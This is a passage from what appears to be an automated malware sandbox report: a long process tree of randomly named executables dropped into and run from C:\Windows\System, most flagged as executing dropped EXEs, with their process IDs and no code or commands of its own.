    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2688" "2960" "2940" "2964" "0" "0" "2968" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:8104
- C:\Windows\System\kGBTajy.exe
  C:\Windows\System\kGBTajy.exe
  2⤵
  - Executes dropped EXE
  PID:2216
- C:\Windows\System\PyLwuUX.exe
  C:\Windows\System\PyLwuUX.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\LBZwdcn.exe
  C:\Windows\System\LBZwdcn.exe
  2⤵
  - Executes dropped EXE
  PID:220
- C:\Windows\System\ZsBbtaP.exe
  C:\Windows\System\ZsBbtaP.exe
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Windows\System\goDmKZQ.exe
  C:\Windows\System\goDmKZQ.exe
  2⤵
  - Executes dropped EXE
  PID:364
- C:\Windows\System\jvspCnf.exe
  C:\Windows\System\jvspCnf.exe
  2⤵
  - Executes dropped EXE
  PID:2404
- C:\Windows\System\xjJApYL.exe
  C:\Windows\System\xjJApYL.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Windows\System\PyYwltF.exe
  C:\Windows\System\PyYwltF.exe
  2⤵
  - Executes dropped EXE
  PID:2336
- C:\Windows\System\lXfvMik.exe
  C:\Windows\System\lXfvMik.exe
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Windows\System\lHbWrlh.exe
  C:\Windows\System\lHbWrlh.exe
  2⤵
  - Executes dropped EXE
  PID:824
- C:\Windows\System\tWTjknP.exe
  C:\Windows\System\tWTjknP.exe
  2⤵
  - Executes dropped EXE
  PID:1084
- C:\Windows\System\Rmcxqum.exe
  C:\Windows\System\Rmcxqum.exe
  2⤵
  - Executes dropped EXE
  PID:3356
- C:\Windows\System\rXgTnVs.exe
  C:\Windows\System\rXgTnVs.exe
  2⤵
  - Executes dropped EXE
  PID:3688
- C:\Windows\System\FuRgVMu.exe
  C:\Windows\System\FuRgVMu.exe
  2⤵
  - Executes dropped EXE
  PID:2480
- C:\Windows\System\HHSKiBd.exe
  C:\Windows\System\HHSKiBd.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Windows\System\gZfWTwG.exe
  C:\Windows\System\gZfWTwG.exe
  2⤵
  - Executes dropped EXE
  PID:3524
- C:\Windows\System\boXsfpl.exe
  C:\Windows\System\boXsfpl.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\rdtTPfD.exe
  C:\Windows\System\rdtTPfD.exe
  2⤵
  - Executes dropped EXE
  PID:992
- C:\Windows\System\VOYDvvN.exe
  C:\Windows\System\VOYDvvN.exe
  2⤵
  - Executes dropped EXE
  PID:392
- C:\Windows\System\mSQavIs.exe
  C:\Windows\System\mSQavIs.exe
  2⤵
  - Executes dropped EXE
  PID:4464
- C:\Windows\System\jhsHhoM.exe
  C:\Windows\System\jhsHhoM.exe
  2⤵
  - Executes dropped EXE
  PID:488
- C:\Windows\System\AFpIimZ.exe
  C:\Windows\System\AFpIimZ.exe
  2⤵
  - Executes dropped EXE
  PID:2168
- C:\Windows\System\cDQkeJW.exe
  C:\Windows\System\cDQkeJW.exe
  2⤵
  - Executes dropped EXE
  PID:1540
- C:\Windows\System\urWeOmh.exe
  C:\Windows\System\urWeOmh.exe
  2⤵
  - Executes dropped EXE
  PID:2820
- C:\Windows\System\KfrTbtY.exe
  C:\Windows\System\KfrTbtY.exe
  2⤵
  - Executes dropped EXE
  PID:1268
- C:\Windows\System\gbdKgFD.exe
  C:\Windows\System\gbdKgFD.exe
  2⤵
  - Executes dropped EXE
  PID:4848
- C:\Windows\System\HDhzRoy.exe
  C:\Windows\System\HDhzRoy.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Windows\System\wOWsEgv.exe
  C:\Windows\System\wOWsEgv.exe
  2⤵
  - Executes dropped EXE
  PID:2272
- C:\Windows\System\OqZFlVJ.exe
  C:\Windows\System\OqZFlVJ.exe
  2⤵
  - Executes dropped EXE
  PID:4800
- C:\Windows\System\nZOYXrm.exe
  C:\Windows\System\nZOYXrm.exe
  2⤵
  - Executes dropped EXE
  PID:3228
- C:\Windows\System\bhQCwDS.exe
  C:\Windows\System\bhQCwDS.exe
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\Windows\System\LLHKvcv.exe
  C:\Windows\System\LLHKvcv.exe
  2⤵
  - Executes dropped EXE
  PID:3520
- C:\Windows\System\kvsIYtz.exe
  C:\Windows\System\kvsIYtz.exe
  2⤵
  - Executes dropped EXE
  PID:2108
- C:\Windows\System\cqtBOpN.exe
  C:\Windows\System\cqtBOpN.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\LfBsmJW.exe
  C:\Windows\System\LfBsmJW.exe
  2⤵
  - Executes dropped EXE
  PID:4844
- C:\Windows\System\BcFfsCv.exe
  C:\Windows\System\BcFfsCv.exe
  2⤵
  - Executes dropped EXE
  PID:2552
- C:\Windows\System\hyBCjGV.exe
  C:\Windows\System\hyBCjGV.exe
  2⤵
  - Executes dropped EXE
  PID:4748
- C:\Windows\System\nNckimI.exe
  C:\Windows\System\nNckimI.exe
  2⤵
  - Executes dropped EXE
  PID:2976
- C:\Windows\System\nLPCFCU.exe
  C:\Windows\System\nLPCFCU.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\XCTwODz.exe
  C:\Windows\System\XCTwODz.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Windows\System\TJiHAvS.exe
  C:\Windows\System\TJiHAvS.exe
  2⤵
  - Executes dropped EXE
  PID:4756
- C:\Windows\System\cpqYbpo.exe
  C:\Windows\System\cpqYbpo.exe
  2⤵
  - Executes dropped EXE
  PID:1440
- C:\Windows\System\WmxWsin.exe
  C:\Windows\System\WmxWsin.exe
  2⤵
  - Executes dropped EXE
  PID:4436
- C:\Windows\System\xhFMzgk.exe
  C:\Windows\System\xhFMzgk.exe
  2⤵
  - Executes dropped EXE
  PID:4424
- C:\Windows\System\bnWzuho.exe
  C:\Windows\System\bnWzuho.exe
  2⤵
  - Executes dropped EXE
  PID:4456
- C:\Windows\System\tmEGHvQ.exe
  C:\Windows\System\tmEGHvQ.exe
  2⤵
  - Executes dropped EXE
  PID:3236
- C:\Windows\System\hZOtmoZ.exe
  C:\Windows\System\hZOtmoZ.exe
  2⤵
  - Executes dropped EXE
  PID:1236
- C:\Windows\System\uhMyBZn.exe
  C:\Windows\System\uhMyBZn.exe
  2⤵
  - Executes dropped EXE
  PID:3656
- C:\Windows\System\QLBdzZF.exe
  C:\Windows\System\QLBdzZF.exe
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Windows\System\nHdmfqb.exe
  C:\Windows\System\nHdmfqb.exe
  2⤵
  - Executes dropped EXE
  PID:552
- C:\Windows\System\pjsJYvS.exe
  C:\Windows\System\pjsJYvS.exe
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Windows\System\oMQiZis.exe
  C:\Windows\System\oMQiZis.exe
  2⤵
  - Executes dropped EXE
  PID:3976
- C:\Windows\System\imIGhBK.exe
  C:\Windows\System\imIGhBK.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\tlgBBbl.exe
  C:\Windows\System\tlgBBbl.exe
  2⤵
  - Executes dropped EXE
  PID:652
- C:\Windows\System\wTWQZfN.exe
  C:\Windows\System\wTWQZfN.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\ZGzoTKN.exe
  C:\Windows\System\ZGzoTKN.exe
  2⤵
  - Executes dropped EXE
  PID:2004
- C:\Windows\System\jHXKAIj.exe
  C:\Windows\System\jHXKAIj.exe
  2⤵
  - Executes dropped EXE
  PID:1044
- C:\Windows\System\AgBSyTB.exe
  C:\Windows\System\AgBSyTB.exe
  2⤵
  - Executes dropped EXE
  PID:756
- C:\Windows\System\lZEkfWq.exe
  C:\Windows\System\lZEkfWq.exe
  2⤵
  - Executes dropped EXE
  PID:4212
- C:\Windows\System\vIMTFAm.exe
  C:\Windows\System\vIMTFAm.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\IQeeXjH.exe
  C:\Windows\System\IQeeXjH.exe
  2⤵
  - Executes dropped EXE
  PID:1400
- C:\Windows\System\hJoEXyL.exe
  C:\Windows\System\hJoEXyL.exe
  2⤵
  - Executes dropped EXE
  PID:568
- C:\Windows\System\iRnUOTk.exe
  C:\Windows\System\iRnUOTk.exe
  2⤵
  - Executes dropped EXE
  PID:2876
- C:\Windows\System\zajRUwp.exe
  C:\Windows\System\zajRUwp.exe
  2⤵
  - Executes dropped EXE
  PID:3844
- C:\Windows\System\ztONwEG.exe
  C:\Windows\System\ztONwEG.exe
  2⤵
  PID:4404
- C:\Windows\System\TDULNwn.exe
  C:\Windows\System\TDULNwn.exe
  2⤵
  PID:3672
- C:\Windows\System\RSvwGzR.exe
  C:\Windows\System\RSvwGzR.exe
  2⤵
  PID:4824
- C:\Windows\System\XQJOJnJ.exe
  C:\Windows\System\XQJOJnJ.exe
  2⤵
  PID:3116
- C:\Windows\System\qwcVPgM.exe
  C:\Windows\System\qwcVPgM.exe
  2⤵
  PID:2472
- C:\Windows\System\pnTWoFr.exe
  C:\Windows\System\pnTWoFr.exe
  2⤵
  PID:5008
- C:\Windows\System\vjLkukB.exe
  C:\Windows\System\vjLkukB.exe
  2⤵
  PID:5000
- C:\Windows\System\bRJipIw.exe
  C:\Windows\System\bRJipIw.exe
  2⤵
  PID:3904
- C:\Windows\System\rsADSFf.exe
  C:\Windows\System\rsADSFf.exe
  2⤵
  PID:464
- C:\Windows\System\SFPwMzb.exe
  C:\Windows\System\SFPwMzb.exe
  2⤵
  PID:1932
- C:\Windows\System\ziPwiGa.exe
  C:\Windows\System\ziPwiGa.exe
  2⤵
  PID:3632
- C:\Windows\System\SAfmDaj.exe
  C:\Windows\System\SAfmDaj.exe
  2⤵
  PID:1468
- C:\Windows\System\gtaiwap.exe
  C:\Windows\System\gtaiwap.exe
  2⤵
  PID:4640
- C:\Windows\System\xDjYXPA.exe
  C:\Windows\System\xDjYXPA.exe
  2⤵
  PID:4876
- C:\Windows\System\rWmpqNg.exe
  C:\Windows\System\rWmpqNg.exe
  2⤵
  PID:1976
- C:\Windows\System\nqoPrFk.exe
  C:\Windows\System\nqoPrFk.exe
  2⤵
  PID:3336
- C:\Windows\System\JtAbGss.exe
  C:\Windows\System\JtAbGss.exe
  2⤵
  PID:1648
- C:\Windows\System\iYIXnFM.exe
  C:\Windows\System\iYIXnFM.exe
  2⤵
  PID:2744
- C:\Windows\System\jjyGXfh.exe
  C:\Windows\System\jjyGXfh.exe
  2⤵
  PID:968
- C:\Windows\System\ilBbLkX.exe
  C:\Windows\System\ilBbLkX.exe
  2⤵
  PID:4528
- C:\Windows\System\CJTXRcM.exe
  C:\Windows\System\CJTXRcM.exe
  2⤵
  PID:2600
- C:\Windows\System\iXkBSyE.exe
  C:\Windows\System\iXkBSyE.exe
  2⤵
  PID:5160
- C:\Windows\System\rNbVOnb.exe
  C:\Windows\System\rNbVOnb.exe
  2⤵
  PID:5204
- C:\Windows\System\BRdCDrp.exe
  C:\Windows\System\BRdCDrp.exe
  2⤵
  PID:5244
- C:\Windows\System\JnRQNjr.exe
  C:\Windows\System\JnRQNjr.exe
  2⤵
  PID:5272
- C:\Windows\System\cgYiOOi.exe
  C:\Windows\System\cgYiOOi.exe
  2⤵
  PID:5292
- C:\Windows\System\xZFuNrT.exe
  C:\Windows\System\xZFuNrT.exe
  2⤵
  PID:5328
- C:\Windows\System\tQJewOz.exe
  C:\Windows\System\tQJewOz.exe
  2⤵
  PID:5368
- C:\Windows\System\ZGytjwD.exe
  C:\Windows\System\ZGytjwD.exe
  2⤵
  PID:5388
- C:\Windows\System\QwEaUcs.exe
  C:\Windows\System\QwEaUcs.exe
  2⤵
  PID:5408
- C:\Windows\System\fNwFSUX.exe
  C:\Windows\System\fNwFSUX.exe
  2⤵
  PID:5444
- C:\Windows\System\rEWffNC.exe
  C:\Windows\System\rEWffNC.exe
  2⤵
  PID:5492
- C:\Windows\System\kEvyUgm.exe
  C:\Windows\System\kEvyUgm.exe
  2⤵
  PID:5512
- C:\Windows\System\zsxwYEA.exe
  C:\Windows\System\zsxwYEA.exe
  2⤵
  PID:5560
- C:\Windows\System\bmCwmTn.exe
  C:\Windows\System\bmCwmTn.exe
  2⤵
  PID:5612
- C:\Windows\System\wZnkzgp.exe
  C:\Windows\System\wZnkzgp.exe
  2⤵
  PID:5636
- C:\Windows\System\ACzMaGH.exe
  C:\Windows\System\ACzMaGH.exe
  2⤵
  PID:5652
- C:\Windows\System\heNbDuM.exe
  C:\Windows\System\heNbDuM.exe
  2⤵
  PID:5684
- C:\Windows\System\NaxoWBq.exe
  C:\Windows\System\NaxoWBq.exe
  2⤵
  PID:5712
- C:\Windows\System\CXfSycy.exe
  C:\Windows\System\CXfSycy.exe
  2⤵
  PID:5740
- C:\Windows\System\vlKbvia.exe
  C:\Windows\System\vlKbvia.exe
  2⤵
  PID:5764
- C:\Windows\System\dneEljn.exe
  C:\Windows\System\dneEljn.exe
  2⤵
  PID:5788
- C:\Windows\System\EGylDmk.exe
  C:\Windows\System\EGylDmk.exe
  2⤵
  PID:5804
- C:\Windows\System\xvHynbW.exe
  C:\Windows\System\xvHynbW.exe
  2⤵
  PID:5828
- C:\Windows\System\qLbDLxN.exe
  C:\Windows\System\qLbDLxN.exe
  2⤵
  PID:5880
- C:\Windows\System\cVOvJeP.exe
  C:\Windows\System\cVOvJeP.exe
  2⤵
  PID:5904
- C:\Windows\System\WJDDsxi.exe
  C:\Windows\System\WJDDsxi.exe
  2⤵
  PID:5924
- C:\Windows\System\ZZGlSOz.exe
  C:\Windows\System\ZZGlSOz.exe
  2⤵
  PID:5968
- C:\Windows\System\bZoDFGi.exe
  C:\Windows\System\bZoDFGi.exe
  2⤵
  PID:5984
- C:\Windows\System\zjvOdXP.exe
  C:\Windows\System\zjvOdXP.exe
  2⤵
  PID:6012
- C:\Windows\System\xlddnKG.exe
  C:\Windows\System\xlddnKG.exe
  2⤵
  PID:6072
- C:\Windows\System\ktHWooK.exe
  C:\Windows\System\ktHWooK.exe
  2⤵
  PID:6088
- C:\Windows\System\JvrZvFv.exe
  C:\Windows\System\JvrZvFv.exe
  2⤵
  PID:2944
- C:\Windows\System\LnJOLdu.exe
  C:\Windows\System\LnJOLdu.exe
  2⤵
  PID:2512
- C:\Windows\System\iEtTlZn.exe
  C:\Windows\System\iEtTlZn.exe
  2⤵
  PID:2528
- C:\Windows\System\FJNETOA.exe
  C:\Windows\System\FJNETOA.exe
  2⤵
  PID:5144
- C:\Windows\System\MGtItuG.exe
  C:\Windows\System\MGtItuG.exe
  2⤵
  PID:5192
- C:\Windows\System\odMhVNL.exe
  C:\Windows\System\odMhVNL.exe
  2⤵
  PID:5256
- C:\Windows\System\SIdVweo.exe
  C:\Windows\System\SIdVweo.exe
  2⤵
  PID:5288
- C:\Windows\System\DAXfJWT.exe
  C:\Windows\System\DAXfJWT.exe
  2⤵
  PID:2772
- C:\Windows\System\uShPpFR.exe
  C:\Windows\System\uShPpFR.exe
  2⤵
  PID:1180
- C:\Windows\System\hrGkJbF.exe
  C:\Windows\System\hrGkJbF.exe
  2⤵
  PID:744
- C:\Windows\System\ymQLWyD.exe
  C:\Windows\System\ymQLWyD.exe
  2⤵
  PID:2756
- C:\Windows\System\jLGkdLh.exe
  C:\Windows\System\jLGkdLh.exe
  2⤵
  PID:5400
- C:\Windows\System\rrTSBxz.exe
  C:\Windows\System\rrTSBxz.exe
  2⤵
  PID:1364
- C:\Windows\System\HXeerdN.exe
  C:\Windows\System\HXeerdN.exe
  2⤵
  PID:5464
- C:\Windows\System\PueYVVB.exe
  C:\Windows\System\PueYVVB.exe
  2⤵
  PID:5556
- C:\Windows\System\TmLHmLJ.exe
  C:\Windows\System\TmLHmLJ.exe
  2⤵
  PID:5648
- C:\Windows\System\lMuyrQI.exe
  C:\Windows\System\lMuyrQI.exe
  2⤵
  PID:5644
- C:\Windows\System\lNBJiXN.exe
  C:\Windows\System\lNBJiXN.exe
  2⤵
  PID:5676
- C:\Windows\System\oYwSPLw.exe
  C:\Windows\System\oYwSPLw.exe
  2⤵
  PID:5776
- C:\Windows\System\wAQdsYZ.exe
  C:\Windows\System\wAQdsYZ.exe
  2⤵
  PID:5816
- C:\Windows\System\PTEVpUU.exe
  C:\Windows\System\PTEVpUU.exe
  2⤵
  PID:5976
- C:\Windows\System\bDYWzCE.exe
  C:\Windows\System\bDYWzCE.exe
  2⤵
  PID:5896
- C:\Windows\System\uZppXDs.exe
  C:\Windows\System\uZppXDs.exe
  2⤵
  PID:6000
- C:\Windows\System\tpJpQBB.exe
  C:\Windows\System\tpJpQBB.exe
  2⤵
  PID:6032
- C:\Windows\System\mrqTAlp.exe
  C:\Windows\System\mrqTAlp.exe
  2⤵
  PID:6132
- C:\Windows\System\XFkrJSc.exe
  C:\Windows\System\XFkrJSc.exe
  2⤵
  PID:5148
- C:\Windows\System\NDtDqMc.exe
  C:\Windows\System\NDtDqMc.exe
  2⤵
  PID:5304
- C:\Windows\System\WizUWLW.exe
  C:\Windows\System\WizUWLW.exe
  2⤵
  PID:1228
- C:\Windows\System\hvJFSzn.exe
  C:\Windows\System\hvJFSzn.exe
  2⤵
  PID:5504
- C:\Windows\System\Ayofhdk.exe
  C:\Windows\System\Ayofhdk.exe
  2⤵
  PID:5632
- C:\Windows\System\pPeBwtc.exe
  C:\Windows\System\pPeBwtc.exe
  2⤵
  PID:5724
- C:\Windows\System\PyGnsMX.exe
  C:\Windows\System\PyGnsMX.exe
  2⤵
  PID:5940
- C:\Windows\System\KiKkIZQ.exe
  C:\Windows\System\KiKkIZQ.exe
  2⤵
  PID:6108
- C:\Windows\System\BqSMDKE.exe
  C:\Windows\System\BqSMDKE.exe
  2⤵
  PID:3696
- C:\Windows\System\AVaJyRW.exe
  C:\Windows\System\AVaJyRW.exe
  2⤵
  PID:5428
- C:\Windows\System\LKCKviD.exe
  C:\Windows\System\LKCKviD.exe
  2⤵
  PID:5704
- C:\Windows\System\tYSvOde.exe
  C:\Windows\System\tYSvOde.exe
  2⤵
  PID:2296
- C:\Windows\System\IFBHbdd.exe
  C:\Windows\System\IFBHbdd.exe
  2⤵
  PID:3204
- C:\Windows\System\mUiifvj.exe
  C:\Windows\System\mUiifvj.exe
  2⤵
  PID:1984
- C:\Windows\System\BSYEsUI.exe
  C:\Windows\System\BSYEsUI.exe
  2⤵
  PID:6164
- C:\Windows\System\BBcrcxg.exe
  C:\Windows\System\BBcrcxg.exe
  2⤵
  PID:6196
- C:\Windows\System\bZeDFyb.exe
  C:\Windows\System\bZeDFyb.exe
  2⤵
  PID:6220
- C:\Windows\System\YzPQcxx.exe
  C:\Windows\System\YzPQcxx.exe
  2⤵
  PID:6252
- C:\Windows\System\XOulxpr.exe
  C:\Windows\System\XOulxpr.exe
  2⤵
  PID:6268
- C:\Windows\System\FaRWsTa.exe
  C:\Windows\System\FaRWsTa.exe
  2⤵
  PID:6288
- C:\Windows\System\ljVUtAb.exe
  C:\Windows\System\ljVUtAb.exe
  2⤵
  PID:6308
- C:\Windows\System\ooYlsAn.exe
  C:\Windows\System\ooYlsAn.exe
  2⤵
  PID:6332
- C:\Windows\System\lnHRpWb.exe
  C:\Windows\System\lnHRpWb.exe
  2⤵
  PID:6376
- C:\Windows\System\mpFbifc.exe
  C:\Windows\System\mpFbifc.exe
  2⤵
  PID:6392
- C:\Windows\System\SQxejGk.exe
  C:\Windows\System\SQxejGk.exe
  2⤵
  PID:6416
- C:\Windows\System\cZqnrEi.exe
  C:\Windows\System\cZqnrEi.exe
  2⤵
  PID:6444
- C:\Windows\System\BwIGUgH.exe
  C:\Windows\System\BwIGUgH.exe
  2⤵
  PID:6472
- C:\Windows\System\KbmvBsn.exe
  C:\Windows\System\KbmvBsn.exe
  2⤵
  PID:6492
- C:\Windows\System\bdQRSMa.exe
  C:\Windows\System\bdQRSMa.exe
  2⤵
  PID:6520
- C:\Windows\System\vZgxlon.exe
  C:\Windows\System\vZgxlon.exe
  2⤵
  PID:6544
- C:\Windows\System\reJTQKF.exe
  C:\Windows\System\reJTQKF.exe
  2⤵
  PID:6572
- C:\Windows\System\GDxfSjJ.exe
  C:\Windows\System\GDxfSjJ.exe
  2⤵
  PID:6588
- C:\Windows\System\aSeQgUv.exe
  C:\Windows\System\aSeQgUv.exe
  2⤵
  PID:6644
- C:\Windows\System\JGcAKpl.exe
  C:\Windows\System\JGcAKpl.exe
  2⤵
  PID:6692
- C:\Windows\System\clxBetS.exe
  C:\Windows\System\clxBetS.exe
  2⤵
  PID:6720
- C:\Windows\System\IEuYHTg.exe
  C:\Windows\System\IEuYHTg.exe
  2⤵
  PID:6748
- C:\Windows\System\UYdPqmC.exe
  C:\Windows\System\UYdPqmC.exe
  2⤵
  PID:6776
- C:\Windows\System\pHfRrXt.exe
  C:\Windows\System\pHfRrXt.exe
  2⤵
  PID:6796
- C:\Windows\System\zyGBeWU.exe
  C:\Windows\System\zyGBeWU.exe
  2⤵
  PID:6816
- C:\Windows\System\EfbsvME.exe
  C:\Windows\System\EfbsvME.exe
  2⤵
  PID:6840
- C:\Windows\System\nvgxyOB.exe
  C:\Windows\System\nvgxyOB.exe
  2⤵
  PID:6860
- C:\Windows\System\CWyoNDe.exe
  C:\Windows\System\CWyoNDe.exe
  2⤵
  PID:6892
- C:\Windows\System\CIYgaEG.exe
  C:\Windows\System\CIYgaEG.exe
  2⤵
  PID:6916
- C:\Windows\System\oqFxHAP.exe
  C:\Windows\System\oqFxHAP.exe
  2⤵
  PID:6932
- C:\Windows\System\cCJwPtP.exe
  C:\Windows\System\cCJwPtP.exe
  2⤵
  PID:6984
- C:\Windows\System\YqmLLDS.exe
  C:\Windows\System\YqmLLDS.exe
  2⤵
  PID:7020
- C:\Windows\System\CqxZxst.exe
  C:\Windows\System\CqxZxst.exe
  2⤵
  PID:7048
- C:\Windows\System\HvFAUVu.exe
  C:\Windows\System\HvFAUVu.exe
  2⤵
  PID:7072
- C:\Windows\System\vOrCKBs.exe
  C:\Windows\System\vOrCKBs.exe
  2⤵
  PID:7100
- C:\Windows\System\NAUMCRA.exe
  C:\Windows\System\NAUMCRA.exe
  2⤵
  PID:7128
- C:\Windows\System\TIWIsfc.exe
  C:\Windows\System\TIWIsfc.exe
  2⤵
  PID:7160
- C:\Windows\System\WGzBbmu.exe
  C:\Windows\System\WGzBbmu.exe
  2⤵
  PID:6156
- C:\Windows\System\oTGqmhA.exe
  C:\Windows\System\oTGqmhA.exe
  2⤵
  PID:5060
- C:\Windows\System\JCDKaUB.exe
  C:\Windows\System\JCDKaUB.exe
  2⤵
  PID:6232
- C:\Windows\System\VVRiWWa.exe
  C:\Windows\System\VVRiWWa.exe
  2⤵
  PID:6284
- C:\Windows\System\jHNXMqL.exe
  C:\Windows\System\jHNXMqL.exe
  2⤵
  PID:6364
- C:\Windows\System\Xcradxg.exe
  C:\Windows\System\Xcradxg.exe
  2⤵
  PID:6432
- C:\Windows\System\ODlzQGc.exe
  C:\Windows\System\ODlzQGc.exe
  2⤵
  PID:6484
- C:\Windows\System\NTTUhXO.exe
  C:\Windows\System\NTTUhXO.exe
  2⤵
  PID:6532
- C:\Windows\System\RAQZwiB.exe
  C:\Windows\System\RAQZwiB.exe
  2⤵
  PID:6596
- C:\Windows\System\gZyqlvB.exe
  C:\Windows\System\gZyqlvB.exe
  2⤵
  PID:6716
- C:\Windows\System\AtQHidx.exe
  C:\Windows\System\AtQHidx.exe
  2⤵
  PID:6812
- C:\Windows\System\CTezVrY.exe
  C:\Windows\System\CTezVrY.exe
  2⤵
  PID:6872
- C:\Windows\System\PUqzOeh.exe
  C:\Windows\System\PUqzOeh.exe
  2⤵
  PID:5344
- C:\Windows\System\Alspksd.exe
  C:\Windows\System\Alspksd.exe
  2⤵
  PID:6964
- C:\Windows\System\FxrjmuV.exe
  C:\Windows\System\FxrjmuV.exe
  2⤵
  PID:7012
- C:\Windows\System\xiSnCiy.exe
  C:\Windows\System\xiSnCiy.exe
  2⤵
  PID:7120
- C:\Windows\System\rgINqeY.exe
  C:\Windows\System\rgINqeY.exe
  2⤵
  PID:6184
- C:\Windows\System\qECMlqr.exe
  C:\Windows\System\qECMlqr.exe
  2⤵
  PID:2948
- C:\Windows\System\IbvyIMP.exe
  C:\Windows\System\IbvyIMP.exe
  2⤵
  PID:6352
- C:\Windows\System\nNqxoPV.exe
  C:\Windows\System\nNqxoPV.exe
  2⤵
  PID:6500
- C:\Windows\System\xueNBhu.exe
  C:\Windows\System\xueNBhu.exe
  2⤵
  PID:6624
- C:\Windows\System\znPDYCZ.exe
  C:\Windows\System\znPDYCZ.exe
  2⤵
  PID:6924
- C:\Windows\System\fSPEGvZ.exe
  C:\Windows\System\fSPEGvZ.exe
  2⤵
  PID:7068
- C:\Windows\System\CejqUjx.exe
  C:\Windows\System\CejqUjx.exe
  2⤵
  PID:5460
- C:\Windows\System\krWWUGj.exe
  C:\Windows\System\krWWUGj.exe
  2⤵
  PID:5216
- C:\Windows\System\EqOlmlP.exe
  C:\Windows\System\EqOlmlP.exe
  2⤵
  PID:6584
- C:\Windows\System\TOdKUxh.exe
  C:\Windows\System\TOdKUxh.exe
  2⤵
  PID:6904
- C:\Windows\System\Lbyzgib.exe
  C:\Windows\System\Lbyzgib.exe
  2⤵
  PID:6264
- C:\Windows\System\ZcidOQh.exe
  C:\Windows\System\ZcidOQh.exe
  2⤵
  PID:5544
- C:\Windows\System\kTWPXfv.exe
  C:\Windows\System\kTWPXfv.exe
  2⤵
  PID:6756
- C:\Windows\System\YydEOps.exe
  C:\Windows\System\YydEOps.exe
  2⤵
  PID:7188
- C:\Windows\System\feHDhqz.exe
  C:\Windows\System\feHDhqz.exe
  2⤵
  PID:7208
- C:\Windows\System\hKfBsRX.exe
  C:\Windows\System\hKfBsRX.exe
  2⤵
  PID:7232
- C:\Windows\System\YpbsXiY.exe
  C:\Windows\System\YpbsXiY.exe
  2⤵
  PID:7252
- C:\Windows\System\MWXOYBW.exe
  C:\Windows\System\MWXOYBW.exe
  2⤵
  PID:7276
- C:\Windows\System\YnKbUvv.exe
  C:\Windows\System\YnKbUvv.exe
  2⤵
  PID:7320
- C:\Windows\System\JwJKJFI.exe
  C:\Windows\System\JwJKJFI.exe
  2⤵
  PID:7344
- C:\Windows\System\eIICQlN.exe
  C:\Windows\System\eIICQlN.exe
  2⤵
  PID:7368
- C:\Windows\System\WTmGRTn.exe
  C:\Windows\System\WTmGRTn.exe
  2⤵
  PID:7392
- C:\Windows\System\YBGpwpg.exe
  C:\Windows\System\YBGpwpg.exe
  2⤵
  PID:7412
- C:\Windows\System\LaNEsKt.exe
  C:\Windows\System\LaNEsKt.exe
  2⤵
  PID:7460
- C:\Windows\System\QDOzEuo.exe
  C:\Windows\System\QDOzEuo.exe
  2⤵
  PID:7504
- C:\Windows\System\ZIwlhby.exe
  C:\Windows\System\ZIwlhby.exe
  2⤵
  PID:7532
- C:\Windows\System\LXRvNdQ.exe
  C:\Windows\System\LXRvNdQ.exe
  2⤵
  PID:7552
- C:\Windows\System\OGEMTCg.exe
  C:\Windows\System\OGEMTCg.exe
  2⤵
  PID:7572
- C:\Windows\System\lVxnCWJ.exe
  C:\Windows\System\lVxnCWJ.exe
  2⤵
  PID:7612
- C:\Windows\System\eJbAgOQ.exe
  C:\Windows\System\eJbAgOQ.exe
  2⤵
  PID:7636
- C:\Windows\System\YRKSPaw.exe
  C:\Windows\System\YRKSPaw.exe
  2⤵
  PID:7664
- C:\Windows\System\bWzTFLs.exe
  C:\Windows\System\bWzTFLs.exe
  2⤵
  PID:7700
- C:\Windows\System\cPhcFKl.exe
  C:\Windows\System\cPhcFKl.exe
  2⤵
  PID:7724
- C:\Windows\System\ZZCpqtf.exe
  C:\Windows\System\ZZCpqtf.exe
  2⤵
  PID:7744
- C:\Windows\System\TeTPNns.exe
  C:\Windows\System\TeTPNns.exe
  2⤵
  PID:7772
- C:\Windows\System\YfQvpkd.exe
  C:\Windows\System\YfQvpkd.exe
  2⤵
  PID:7800
- C:\Windows\System\ShPutYM.exe
  C:\Windows\System\ShPutYM.exe
  2⤵
  PID:7840
- C:\Windows\System\wiHAVdC.exe
  C:\Windows\System\wiHAVdC.exe
  2⤵
  PID:7864
- C:\Windows\System\jSsdHPE.exe
  C:\Windows\System\jSsdHPE.exe
  2⤵
  PID:7884
- C:\Windows\System\ZDlpZhk.exe
  C:\Windows\System\ZDlpZhk.exe
  2⤵
  PID:7924
- C:\Windows\System\Mqfgjen.exe
  C:\Windows\System\Mqfgjen.exe
  2⤵
  PID:7952
- C:\Windows\System\BUdqVVK.exe
  C:\Windows\System\BUdqVVK.exe
  2⤵
  PID:7972
- C:\Windows\System\PFXmdZo.exe
  C:\Windows\System\PFXmdZo.exe
  2⤵
  PID:8004
- C:\Windows\System\lIrvSTt.exe
  C:\Windows\System\lIrvSTt.exe
  2⤵
  PID:8024
- C:\Windows\System\TnDqgWl.exe
  C:\Windows\System\TnDqgWl.exe
  2⤵
  PID:8072
- C:\Windows\System\SVEMira.exe
  C:\Windows\System\SVEMira.exe
  2⤵
  PID:8120
- C:\Windows\System\TVsRZNu.exe
  C:\Windows\System\TVsRZNu.exe
  2⤵
  PID:8136
- C:\Windows\System\eGRIBOG.exe
  C:\Windows\System\eGRIBOG.exe
  2⤵
  PID:8160
- C:\Windows\System\sriTIBJ.exe
  C:\Windows\System\sriTIBJ.exe
  2⤵
  PID:6428
- C:\Windows\System\DGUzpgz.exe
  C:\Windows\System\DGUzpgz.exe
  2⤵
  PID:7216
